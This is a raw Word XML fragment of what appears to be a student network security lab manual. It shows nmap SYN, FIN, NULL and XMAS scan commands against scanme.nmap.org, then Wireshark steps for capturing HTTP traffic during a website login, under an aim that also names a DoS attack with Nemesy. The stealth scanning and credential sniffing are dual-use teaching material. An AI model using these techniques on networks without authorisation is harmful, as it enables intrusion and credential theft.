        <w:ind w:left="581"/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-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>sA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> -T4 scanme.nmap.org</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="581"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="20078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64" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="941"/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>SYN (Stealth) Scan (-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>sS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="581"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>SYN scan is the default and most popular scan option for good reason. It can be performed quickly, scanning thousands of ports per second on a fast network not hampered by intrusive firewalls.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText"/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-p22</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>,113,139</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> scanme.nmap.org</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="581"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5114925" cy="1438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64" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564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D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="581"/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>FIN Scan (-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>sF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="581"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>Sets just the TCP FIN bit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText"/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-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>sF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> -T4 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>para</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4295775" cy="20669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64" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="581"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="581"/>
        <w:rPr>
          <w:b/>
        </w:rPr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 xml:space="preserve">NULL Scan </w:t>
      </w:r>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>sN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="581"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>Does not set any bits (TCP flag header is 0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="581"/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–</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>sN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> –p 22 scanme.nmap.org</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="581"/>
        <w:rPr>
          <w:b/>
        </w:rPr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rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="134620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64" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="581"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>XMAS Scan (-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>sX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="581"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>Sets the FIN, PSH, and URG flags, lighting the packet up like a Christmas tree.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="581"/>
      </w:pP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t xml:space="preserve">Command: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>sX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> -T4 scanme.nmap.org</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="581"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4419600" cy="129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 w:rsidP="005B6F48">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6"/>
        <w:sectPr w:rsidR="00390B00" w:rsidRPr="00D4195F">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="680" w:right="1040" w:bottom="126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5B6F48" w:rsidP="005B6F48">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7565"/>
          <w:tab w:val="left" w:pos="8937"/>
        </w:tabs>
        <w:spacing w:before="37"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>PRACTCAL NO. 5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00390B00">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="00390B00" w:rsidRPr="00D4195F">
          <w:footerReference w:type="default" r:id="rId51"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="680" w:right="1040" w:bottom="124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C72C38" w:rsidRDefault="00C72C38" w:rsidP="00D4195F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="0" w:right="-2673"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRDefault="005A7397">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">AIM: </w:t>
      </w:r>
      <w:r w:rsidRPr="005A7397">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Network Traffic Capture and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A7397">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>DoS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A7397">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Attack with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A7397">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A7397">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A7397">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Nemesy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A7397" w:rsidRPr="005A7397" w:rsidRDefault="005A7397" w:rsidP="005A7397">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Network Traffic Capture:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A7397" w:rsidRPr="005A7397" w:rsidRDefault="005A7397" w:rsidP="005A7397">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to capture network traffic on a specific network interface. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A7397" w:rsidRPr="00D4195F" w:rsidRDefault="005A7397" w:rsidP="005A7397">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Analyze the captured packets to extract relevant information and identify potential security issues</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A4412E" w:rsidRDefault="00A4412E" w:rsidP="005A7397">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="221"/>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4" w:rsidP="005A7397">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="221"/>
        <w:sectPr w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidSect="00C72C38">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="680" w:right="1040" w:bottom="1240" w:left="12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3840" w:equalWidth="0">
            <w:col w:w="7144" w:space="708"/>
            <w:col w:w="2128"/>
          </w:cols>
        </w:sectPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">1: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve">Install </w:t>
      </w:r>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>WireShark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D4195F">
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00390B00">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="250"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5988177" cy="3224403"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="425" name="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21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00" w:rsidRPr="00D4195F" w:rsidRDefault="00390B00">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005A7397" w:rsidRDefault="005A7397">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="90"/>
        <w:ind w:left="221"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005A7397" w:rsidRDefault="005A7397">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="90"/>
        <w:ind w:left="221"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="90"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>Step 2: Go to Capture tab and select Interface option.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251410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288</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5881647" cy="2893695"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="427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1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647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  <w:spacing w:before="8"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00390B00">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7565"/>
          <w:tab w:val="left" w:pos="8937"/>
        </w:tabs>
        <w:spacing w:before="37"/>
        <w:ind w:left="221"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00296621">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7565"/>
          <w:tab w:val="left" w:pos="8316"/>
        </w:tabs>
        <w:spacing w:before="158"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:color w:val="808080"/>
        </w:rPr>
        <w:tab/>
      </w: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>Step 3: In Capture interface, Select Local Area Connection and click on start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  <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="25141145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36728" cy="1645920"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="429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15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72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90"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>Step 4: The source, Destination and protocols of the packets in the LAN network are displayed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="25141248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3844</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5917066" cy="3186112"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="431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16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066" cy="318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 w:rsidP="00E54A23">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:sectPr w:rsidR="00390B00" w:rsidRPr="00D4195F">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="680" w:right="1040" w:bottom="124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D03C4" w:rsidP="00E54A23">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7565"/>
          <w:tab w:val="left" w:pos="8316"/>
        </w:tabs>
        <w:spacing w:before="158"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="25141350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77796</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5988177" cy="3224403"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="433" name="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1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21" w:rsidRPr="00D4195F">
        <w:rPr>
          <w:color w:val="808080"/>
        </w:rPr>
        <w:tab/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spacing w:before="90"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>Step 5: Open a website in a new window and enter the user id and password. Register if needed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="25141452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2548</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5928851" cy="3829050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="435" name="image2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1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851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10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32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90B00">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>Step 6: Enter the credentials and then sign in.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="25141555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31986</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5947180" cy="3845052"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="437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21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180" cy="3845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226"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">Step 7: The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> tool will keep recording the packets.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="25141657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876</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5881647" cy="2893695"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="439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2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647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2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pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="680" w:right="1040" w:bottom="1320" w:left="1220" w:header="0" w:footer="104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3D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:lastRenderedPageBreak/>
        <w:t>Step 8: Select filter as http to make the search easier and click on apply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141760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88177" cy="3224403"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="441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2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66"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>Step 9: Now stop the tool to stop recording.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="25141862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176</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5988177" cy="3224403"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="443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2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  <w:spacing w:before="8"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00390B00">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="00390B00" w:rsidRPr="00D4195F">
          <w:footerReference w:type="default" r:id="rId61"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="620" w:right="1040" w:bottom="920" w:left="1220" w:header="0" w:footer="73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390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00296621" w:rsidP="008577E0">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7565"/>
          <w:tab w:val="left" w:pos="8316"/>
        </w:tabs>
        <w:spacing w:before="158"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:color w:val="808080"/>
